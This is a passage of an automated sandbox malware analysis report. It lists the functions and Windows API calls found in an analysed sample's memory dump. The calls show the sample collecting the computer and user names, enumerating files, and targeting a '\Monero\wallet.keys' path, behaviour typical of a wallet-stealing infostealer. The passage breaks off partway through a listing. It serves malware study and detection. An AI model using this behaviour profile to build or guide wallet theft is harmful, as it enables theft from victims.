Instruction Fuzzy Hash: AA01D676900208A7DB54FBB4DC46EEE333CFB65300F004545B64AD2591EE74AA89CBA3

Function 008910A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 008910B3
VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 008910F7

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: a104f13cbb61699d83422e2c3bba818fb062e62dc570a949b53896f0ec08dfed
Instruction ID: 61b09bbe3cfea66cc7f242bd9e2c92c8db421b69421299ab30349b3c9e6f337a
Opcode Fuzzy Hash: a104f13cbb61699d83422e2c3bba818fb062e62dc570a949b53896f0ec08dfed
Instruction Fuzzy Hash: D2F0E271A41208BBEB14EAA8AC49FAFB7E8E705B15F300448F905E3280D5729E00DAA1

Function 008A8D90 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,00891B54,?,?,008B564C,?,?,008B0E1F), ref: 008A8D9F

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: e352ec17a3aca9e1203b8c4490ca5fff8937d7e5d761b0868cdc0387fcc25325
Instruction ID: a7ee566942dd575135853f6710d7248aa2fe37033fffe140df5c02519f2e0d27
Opcode Fuzzy Hash: e352ec17a3aca9e1203b8c4490ca5fff8937d7e5d761b0868cdc0387fcc25325
Instruction Fuzzy Hash: DBF01570C0020CEBEB04EFA8D5496DCBB74FB12310F108199E826E7AC0DB346B46DB82

Function 008A8DE0 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 008A8E0B

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: d37e2156965242cc452e3c6a3a5e811d1356ce2ab3d9d497db0b67015f74c63f
Instruction ID: 392dc5a0d5468d8c2cd469a06c01599bf80828785107a2018fa3b4ff5b834f22
Opcode Fuzzy Hash: d37e2156965242cc452e3c6a3a5e811d1356ce2ab3d9d497db0b67015f74c63f
Instruction Fuzzy Hash: BFE0123194034C6BEB91DB94CC96FAE777CEB44B01F004295BA0C9A1C0DE70AB858B92

Function 00891190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 008A78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 008A7910
Part of subcall function 008A78E0: RtlAllocateHeap.NTDLL(00000000), ref: 008A7917
Part of subcall function 008A78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 008A792F

Part of subcall function 008A7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,008911B7), ref: 008A7880
Part of subcall function 008A7850: RtlAllocateHeap.NTDLL(00000000), ref: 008A7887
Part of subcall function 008A7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 008A789F

ExitProcess.KERNEL32 ref: 008911C6

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateName$ComputerExitUser
String ID:
API String ID: 3550813701-0
Opcode ID: fb923ac71ad3f2a95d0fe7c075eae34d0598c15091259a4bdcca58f63a3ef2f1
Instruction ID: 1563fc319760b7928b66916e9bc648e855d3bc48e79af64401b20413f6eb7cc7
Opcode Fuzzy Hash: fb923ac71ad3f2a95d0fe7c075eae34d0598c15091259a4bdcca58f63a3ef2f1
Instruction Fuzzy Hash: ABE012B5E14302A3EE00B3F8BC0AB2A339CFB25345F081425FA06D2502FA29F801857F

Non-executed Functions

Function 008A38B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 008A38CC
FindFirstFileA.KERNEL32(?,?), ref: 008A38E3
lstrcat.KERNEL32(?,?), ref: 008A3935
StrCmpCA.SHLWAPI(?,008B0F70), ref: 008A3947
StrCmpCA.SHLWAPI(?,008B0F74), ref: 008A395D
FindNextFileA.KERNEL32(000000FF,?), ref: 008A3C67
FindClose.KERNEL32(000000FF), ref: 008A3C7C

Strings

%s\%s, xrefs: 008A397A
%s\%s, xrefs: 008A3A6F
%s\*, xrefs: 008A38C0
%s\%s\%s, xrefs: 008A3A4A
%s%s, xrefs: 008A3AAD

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextlstrcatwsprintf
String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
API String ID: 1125553467-2524465048
Opcode ID: 9e3fd9bc4eb03a3a2a800e738b228a88b29c237f3c4d45acf0b061a76ab2a8ee
Instruction ID: 204d7f84e1a4af7b0d8dd1246d230882b87a889584992f7d56d5db6198d18f6f
Opcode Fuzzy Hash: 9e3fd9bc4eb03a3a2a800e738b228a88b29c237f3c4d45acf0b061a76ab2a8ee
Instruction Fuzzy Hash: 86A14FB1A002189BDB24DBA4DC85FFE7378FB59300F084589B51ED6541EB749B85CF62

Function 008A4570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 008A4580
RtlAllocateHeap.NTDLL(00000000), ref: 008A4587
wsprintfA.USER32 ref: 008A45A6
FindFirstFileA.KERNEL32(?,?), ref: 008A45BD
StrCmpCA.SHLWAPI(?,008B0FC4), ref: 008A45EB
StrCmpCA.SHLWAPI(?,008B0FC8), ref: 008A4601
FindNextFileA.KERNEL32(000000FF,?), ref: 008A468B
FindClose.KERNEL32(000000FF), ref: 008A46A0
lstrcat.KERNEL32(?,0142E8F8), ref: 008A46C5
lstrcat.KERNEL32(?,0142DA80), ref: 008A46D8
lstrlen.KERNEL32(?), ref: 008A46E5
lstrlen.KERNEL32(?), ref: 008A46F6

Strings

%s\%s, xrefs: 008A461B
%s\*, xrefs: 008A459A

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
String ID: %s\%s$%s\*
API String ID: 671575355-2848263008
Opcode ID: b99892fa53ac5a9aae18cf379a5aea81ee687f4675816c3107a660df369c3392
Instruction ID: 45a6ccc14163ca63b7c57266fb3d82948cc07edf0558c1db334a4f1bcbc95c4c
Opcode Fuzzy Hash: b99892fa53ac5a9aae18cf379a5aea81ee687f4675816c3107a660df369c3392
Instruction Fuzzy Hash: 005148B19002189BDB24EBB4DC89FEE737CFB55700F404589B51AD6190EF749B858F92

Function 0089ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 0089ED3E
FindFirstFileA.KERNEL32(?,?), ref: 0089ED55
StrCmpCA.SHLWAPI(?,008B1538), ref: 0089EDAB
StrCmpCA.SHLWAPI(?,008B153C), ref: 0089EDC1
FindNextFileA.KERNEL32(000000FF,?), ref: 0089F2AE
FindClose.KERNEL32(000000FF), ref: 0089F2C3

Strings

%s\*.*, xrefs: 0089ED32

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\*.*
API String ID: 180737720-1013718255
Opcode ID: 3244d0d7cd888809b3c844f09739f092a5a5fa195d6a1654d8fdd4d42ab55ff6
Instruction ID: 8c74fd5886300c97489971d866b3ce8a7fd22ac01b1ac71b7eaa02acf6100c80
Opcode Fuzzy Hash: 3244d0d7cd888809b3c844f09739f092a5a5fa195d6a1654d8fdd4d42ab55ff6
Instruction Fuzzy Hash: CCE1C1719111189AEB58FB64DC91AEE7338FF55300F4441A9B50BE2892EF346B8ACF53

Function 0089DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON

Download Yara Rule

APIs

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

Part of subcall function 008AA9B0: lstrlen.KERNEL32(?,01429018,?,\Monero\wallet.keys,008B0E17), ref: 008AA9C5
Part of subcall function 008AA9B0: lstrcpy.KERNEL32(00000000), ref: 008AAA04
Part of subcall function 008AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008AAA12

Part of subcall function 008AA8A0: lstrcpy.KERNEL32(?,008B0E17), ref: 008AA905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,008B0C2E), ref: 0089DE5E
StrCmpCA.SHLWAPI(?,008B14C8), ref: 0089DEAE
StrCmpCA.SHLWAPI(?,008B14CC), ref: 0089DEC4
FindNextFileA.KERNEL32(000000FF,?), ref: 0089E3E0
FindClose.KERNEL32(000000FF), ref: 0089E3F2

Strings

\*.*, xrefs: 0089DE26

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
